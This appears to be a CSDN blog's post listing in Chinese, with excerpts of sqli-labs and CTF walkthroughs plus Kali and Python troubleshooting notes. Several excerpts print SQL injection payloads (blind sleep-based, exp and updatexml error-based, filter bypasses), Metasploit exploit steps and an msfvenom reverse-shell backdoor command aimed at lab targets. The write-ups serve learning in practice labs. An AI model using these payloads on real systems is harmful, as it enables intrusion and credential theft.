自定义博客皮肤VIP专享

*博客头图:

格式为PNG、JPG,宽度*高度大于1920*100像素,不超过2MB,主视觉建议放在右侧,请参照线上博客头图

请上传大于1920*100像素的图片!

博客底图:

图片格式为PNG、JPG,不超过1MB,可上下左右平铺至整个背景

栏目图:

图片格式为PNG、JPG,图片宽度*高度为300*38像素,不超过0.5MB

主标题颜色:

RGB颜色,例如:#AFAFAF

Hover:

RGB颜色,例如:#AFAFAF

副标题颜色:

RGB颜色,例如:#AFAFAF

自定义博客皮肤

-+
  • 博客(108)
  • 问答 (1)
  • 收藏
  • 关注

原创 Python报错socket.gaierror: [Errno 11001] getaddrinfo failed

【代码】Python报错socket.gaierror: [Errno 11001] getaddrinfo failed。

2023-03-01 21:54:39 2986 1

原创 except Exception as e作用

except Exception as e作用

2022-09-26 22:59:06 5645 1

原创 kali快速更新获取最新版

kali

2022-09-24 18:42:19 1167

原创 kali息屏时间设置

kali息屏时间设置

2022-09-24 17:25:17 1821

原创 sqli-labs26

文章目录一、审查源码1、判断注入点和闭合方式2、过滤方式二、SQL注入1、获取数据库 双写绕过:anandd 大小写绕过And ASCII编码绕过 %20、%0a绕过 内联注释:/!**/ 替换:如 and 可替换为 && ,or 可替换为 || 空格的话我们可以 url 绕过:%a0 || %0b 等等,过滤字符我们可以用 and || or 替代一、审查源码1、判断注入点和闭合方式由于这个是与数据库交互的语句,通过这个判断

2022-06-01 15:28:55 922

原创 sqli-labs25

文章目录一、代码审计二、SQL注入1、获取数据库2、获取数据表3、获取字段一、代码审计1、这个是代码和数据库交汇的地方,可以快速判断注入点和闭合方式 $sql="SELECT * FROM users WHERE id='$id' LIMIT 0,1";2、这个是使用了正则匹配过滤掉and和or,i则是大小写都过滤function blacklist($id){ $id= preg_replace('/or/i',"", $id); //strip out OR (non cas

2022-05-31 09:43:11 465

原创 kali快捷键和设置方式

文章目录一、kali快捷键二、快捷键设置1、2、一、kali快捷键CTRL+sift+T:新添加窗口长这样CTRL+shift+N:打开新窗口关闭窗口复制:CTRL+shift+C 粘贴:CTRL+shift+V查找内容,你们自己翻译一下了,有点麻烦二、快捷键设置1、2、右边2的键你们都可以双击,然后自己按键盘的按键选择自己想要的快捷键...

2022-05-31 09:05:23 2914

原创 sqli-labs23

文章目录一、审查源码一、审查源码这里我就捡重要的代码挑出来说一下preg_replace 函数执行一个正则表达式的搜索和替换,将reg$reg = "/#/";$reg1 = "/--/";$replace = "";$id = preg_replace($reg, $replace, $id);$id = preg_replace($reg1, $replace, $id);$sql="SELECT * FROM users WHERE id='$id' LIMIT 0,1";

2022-05-30 11:41:37 146

原创 sqli-labs-17

文章目录一、判断是否存在注入2、获取数据库一、判断是否存在注入通过审查源码,我们发现提交的代码没有经过过滤,我们·就使用hackbar来SQL注入吧!2、获取数据库' and (ascii(substr(database(),1,1))=115) and sleep(5) --+...

2022-05-23 11:59:39 114

原创 metasploit上线windows2016靶机

文章目录一、生成后门二、windows2016靶机下载后门1、首先,我们需要开启apache2,然后将后门放入/var/www/html目录下2、windows2016下载后门程序三、设置监听1、开启metasploit2、设置监听模块四、上线windows2016靶机攻击机:kali靶机:windows2016一、生成后门由于这个后门没有经过免杀,所以需要你们把windows2016防火墙关闭,你们·可以·自己去学习一下免杀msfvenom -p windows/meterpreter/reve

2022-05-17 23:01:53 649 4

原创 [FATAL] [...am/Cardinal/internal/db/mysql.go:24 InitMySQL()] Failed to connect to mysql database: Er

问题描述这是我搭建awd平台出现的毛病![FATAL] […am/Cardinal/internal/db/mysql.go:24 InitMySQL()] Failed to connect to mysql database: Error 1698: Access denied for user ‘root’@‘localhost’解决方案:没弄这个之前我数据库也能登陆,但是一直搭建报错,弄完就解决了。alter user 'root'@'localhost' identified by '

2022-05-17 15:41:34 494 1

原创 sqli-labs-14

文章目录前言一、抓包、判断注入点二、判断回显字段三、获取数据库四、获取数据表五、获取字段六、获取用户名、密码前言摸鱼..........一、抓包、判断注入点二、判断回显字段其实这里只有两个回显字段的,我这里使用3只是为了让你们方便看passwd=12123"order by 2--+三、获取数据库uname=admin&passwd=12123"and exp(~(select * from (select database() ) a) )--+四、获取数据表un

2022-05-11 15:09:19 317

原创 sqli-labs-13

文章目录一、抓包、判断注入点二、判断回显字段三、获取数据库四、获取数据表五、获取字段六、获取用户名、密码摸鱼中,最近不知道干什么ε=(´ο`*)))唉一、抓包、判断注入点二、判断回显字段其实这里只有两个回显字段的,我这里使用3只是为了让你们方便看uname=234')order by 3--+三、获取数据库uname=234') and exp(~(select * from (select database() ) a) )--+四、获取数据表uname=234') and

2022-05-10 11:42:50 291

原创 sqli-lab(12)

提示:文章写完后,目录可以自动生成,如何生成可参考右边的帮助文档文章目录前言一、pandas是什么?二、使用步骤1.引入库2.读入数据总结前言提示:这里可以添加本文要记录的大概内容:例如:随着人工智能的不断发展,机器学习这门技术也越来越重要,很多人都开启了学习机器学习,本文就介绍了机器学习的基础内容。提示:以下是本篇文章正文内容,下面案例可供参考一、pandas是什么?示例:pandas 是基于NumPy 的一种工具,该工具是为了解决数据分析任务而创建的。二、使用步骤1.引入库代.

2022-05-03 15:01:49 514

原创 sqli-lab(11)

文章目录一、判断注入点二、判断回显字段三、获取数据库四、获取数据表五、获取字段六、获取username、password一、判断注入点首先,我们使用burpsuit抓包,个人认为这样比较方便吧,你们也可以使用其他方式,基本过程都一样二、判断回显字段这里回显字段是有两个,看下图,如果回显字段为3时,响应显示报错,字段为2是则没有报错三、获取数据库uname=1234'union select 1,updatexml(1,concat(0x7e,(select database()),0x7e

2022-05-03 10:13:34 593

原创 Error: A JNI error has occurred, please check your installation and try again Exception in thread “m

文章目录一、报错特征2、解决方法一、报错特征Error: A JNI error has occurred, please check your installation and try againException in thread "main" java.lang.UnsupportedClassVersionError: burp/StartBurp has been compiled by a more recent version of the Java Runtime (class f

2022-04-24 18:04:21 908

原创 CVE-2016-3088漏洞利用

文章目录方法一:使用metasploit1、查找漏洞3、设置参数4、成功利用方法一:使用metasploit1、查找漏洞search CVE-2016-3088 #### 2、使用该模块这里就一个模块,直接使用就行了use 0 3、设置参数1、show options 2、set RHOSTS 192.168.0.1(你自己ip)4、成功利用...

2022-04-24 11:52:19 278

原创 kali安装java8

文章目录一、java下载二、java安装1、配置环境变量2、给jdk1.8设置序列号3、设置所需jdk版本本文借鉴https://www.javatt.com/p/55687,仅供参考学习,如有冒犯或错误,请及时告知。一、java下载我这里是x64位的,按照你们自己需要下载,刚开始选错了,弄了我好久…下载地址二、java安装1、配置环境变量我这java解压放到/root目录下export JAVA_HOME=/root/jdk1.8.0_321 export CLASSPATH=.:$J

2022-04-13 22:36:47 2768 1

原创 ENSP下载还有其他资料地址

这是我在网上看到的资料地址,安不安全你们自己看着办。https://forum.huawei.com/enterprise/zh/thread-584872.html

2022-03-29 22:48:42 520

原创 kali更换源(详细)

kali源地址,以后找源地址就方便多了。

2022-02-25 09:08:32 36749 25

原创 fatal: unable to access ‘https://github.com/EmpireProject/Empire.git/‘: GnuTLS recv error (-54): Err

错误:git clone https://github.com/EmpireProject/Empire.git修改后:git clone git://github.com/EmpireProject/Empire.git本文借鉴https://blog.csdn.net/gbz3300255/article/details/97103621,如有冒犯或错误,请及时告知。Thanks♪(・ω・)ノ!...

2021-11-24 10:45:54 298

原创 supersqli 攻防世界

文章目录一、知识拓展1、我在mi数据库中创建了一个数据表2、使用handler读取数据二、堆叠注入1、查找注入点2、查看数据库、数据表3、查看表的内容一、知识拓展mysql除可使用select查询表中的数据,也可使用handler语句,这条语句使我们能够一行一行的浏览一个表中的数据1、我在mi数据库中创建了一个数据表2、使用handler读取数据总结下来就四条命令,不难,你们自己尝试动手一下,加深印象,handler打开后要关闭,没有关闭下次打不开HANDLER mi open; 打开mi表

2021-11-22 16:32:04 441

原创 Web_php_include 攻防世界

文章目录一、审查源码二、解决步骤1、使用data://数据流封装器,以传递相应格式的数据。用来执行PHP代码。一、审查源码<?phpshow_source(__FILE__);echo $_GET['hello'];$page=$_GET['page'];while (strstr($page, "php://")) { # strstr() 查找字符串首次出现的位置。返回字符串剩余部分 $page=str_replace("php://", "", $page);

2021-11-20 16:07:50 361

原创 python统计ip出现次数

# coding = utf-8import rewith open('D://1/1.txt','r',encoding='utf-8') as f: line = f.read().strip() # strip:去除首尾空格 result = re.split(r"[\s\n]", line) # \s:从左往右 \n:换行# print(result)ip_count = {}for ip in result: if ip not in ip_co

2021-11-17 19:35:35 1380

原创 UnicodeDecodeError: ‘gbk‘ codec can‘t decode byte 0xbd in position 23368: illegal multibyte sequence

注:错误# coding = utf-8import rewith open('D://1/1.txt','r') as f: line = f.read().strip() result = re.split(r"[\s\n]", line) # \s:从左往右 \n:换行 print(result)D:\python\python.exe D:/pycharm/pythonfile/2021/ip_times.pyTraceback (most recent

2021-11-17 19:02:29 389

原创 Linux文件在其他主机下载

文章目录一、将文件拷贝到/var/www/html目录下一、将文件拷贝到/var/www/html目录下

2021-11-15 15:40:29 855

原创 python->os.listdir FileNotFoundError: [WinError 3] 系统找不到指定的路径

错误:import os# 访问操作系统的模块;可以实现跨平台访问# print(os.sep)# print(os.name)dirs = "D:\\burpsuit\\burp"files = os.listdir("dirs")# print()# 返回指定目录下所有文件名和目录名print(files)解决方法:import os# 访问操作系统的模块;可以实现跨平台访问# print(os.sep)# print(os.name)# dirs = "D:\\bur

2021-11-14 20:38:06 4799

原创 BUUCTF [WUSTCTF2020]alison_likes_jojo

文章目录一、解压缩包1、修改图片宽高二、使用010打开三、暴力破解四、base64解密一、解压缩包解压压缩包后得到两张图片和一个文本,文本基本没有什么线索,其中一张图片图片或许可能宽高被修改。1、修改图片宽高修改宽高之后发现与原图并没有什么区别,所以我们尝试换一种思路二、使用010打开使用010模板打开boki.jpg(如果你们没有jpg模板就去模板库下载),发现末尾隐藏个压缩包文件010打开另一个窗口,将压缩包文件复制粘贴过去,然后另存为zip文件三、暴力破解使用winhex查看压

2021-11-13 11:22:50 779

原创 .md文件查看

图例:我这是使用坚果云打开的里面还有其他工具和功能,脑图、笔记、而且免费。

2021-11-12 21:05:59 724

原创 Kali修改终端字体大小

文章目录一、Kali终端修改字体大小1.打开终端,选择参数配置2、界面设置中点击右上角修改配置一、Kali终端修改字体大小1.打开终端,选择参数配置2、界面设置中点击右上角修改配置

2021-11-11 20:29:00 5190

原创 zip伪加密方法

文章目录一、题目:[ACTF新生赛2020]swp1、使用wireshark打开2、使用ZipCenOp.jar修复3、使用010打开得到flag一、题目:[ACTF新生赛2020]swp工具地址(这是我在网上找的):https://blog.csdn.net/pdsu161530247/article/details/73612910/1、使用wireshark打开导出http文件发现一个压缩包文件,但是被伪加密2、使用ZipCenOp.jar修复java -jar ZipCenOp.ja

2021-11-10 23:57:39 730

原创 BUUCTF [SUCTF2018]single dog

文章目录一、使用010editor打开一、使用010editor打开       1、使用010模板,选择jpg类型,因为图片后缀jpg,如果没有选择2,去模板库下载       2、发现图片有问题,逐步看下去,发现压缩包       3、010新建16进制文件窗口,保存zip&nbs

2021-11-10 19:33:46 671

原创 BUUCTF 我吃三明治

文章目录一、使用010editor模块打开一、使用010editor模块打开       1、打开发现有另一张图片       2、得到另一张图片后发现并没有什么东西       3、往回看题目时发现像base家族的密文,使用CaptfEncoder解密,发现是base32解密fl

2021-11-10 19:05:50 472

原创 BUUCTF [RoarCTF 2019]Easy Calc

文章目录一、 [RoarCTF 2019]Easy Calc1、检查源码2、利用PHP的字符串解析绕过一、 [RoarCTF 2019]Easy Calc1、检查源码       1、当拿到题目时,本人以为是使用Linux命令获取flag,但是尝试之后不行       2、检查源码,发现了calc.php,打开    

2021-11-09 20:01:28 815

原创 Account1 不在 sudoers 文件中。此事将被报告。

文章目录一、解决步骤一、解决步骤1、切换root目录下,然后 vim /etc/sudoers2、在·root下面添加Account1 ALL=(ALL) ALL

2021-11-09 09:35:28 115

原创 DosBox安装

这是我在B站找的挺棒的教程,你们可以看看。添加链接描述

2021-11-08 15:40:15 111

原创 metasploit解决windows靶机乱码问题

当metasploit获取windows权限之后发现乱码chcp 65001例:解决方法:

2021-11-08 10:56:59 337

原创 Metasploit入侵win7

文章目录一、Metasploit是什么?1、Auxiliaries(辅助模块)2、Exploit(渗透攻击模块)3、payload(攻击载荷模块)4、Post(后期渗透模块)5、Encoder(编码工具模块)二、Metasploit入侵步骤1.引入库2.读入数据一、Metasploit是什么?这里我简单介绍一下,方便你们小白了解(大佬直接跳过就行)Metasploit框架是一个开源工具,旨在方便渗透测试,他是有ruby程序语言编写的模板化框架,具有很好的扩展性,便于渗透测试人员开发,使用定制的工具模板

2021-11-07 17:50:30 1857

原创 攻防世界 php_rce

ThinkPHP V5.0漏洞利用一、ThinkPHP V5.0漏洞1、审查源码2、ThinkPHP V5.0漏洞利用笔记:作为新手,感觉这些题目真的不友好,看得懂方法,不知道原理,好好学吧!(# ̄~ ̄#)一、ThinkPHP V5.0漏洞1、审查源码首先,我的思路是检查源码和抓包,但是都没有收获2、ThinkPHP V5.0漏洞利用1、在没有任何思路的情况下,我把ThinkPHP V5.0粘贴到网页上查看,找到了ThinkPHP V5.0漏洞利用http://111.200.241.244

2021-11-03 23:09:03 1879

原创 图片隐写术:方法1

文章目录一、题目二、解题方法1、安装模块2、打开一、题目二、解题方法首先,我使用winhex和stegslove查看都没有得出信息,或许是代码量或者个人水平原因吧,抛开这些,我们回到正题。1、安装模块其他模块你们自己选择安装2、打开...

2021-11-03 15:10:44 478

空空如也

TA创建的收藏夹 TA关注的收藏夹

TA关注的人

提示
确定要删除当前文章?
取消 删除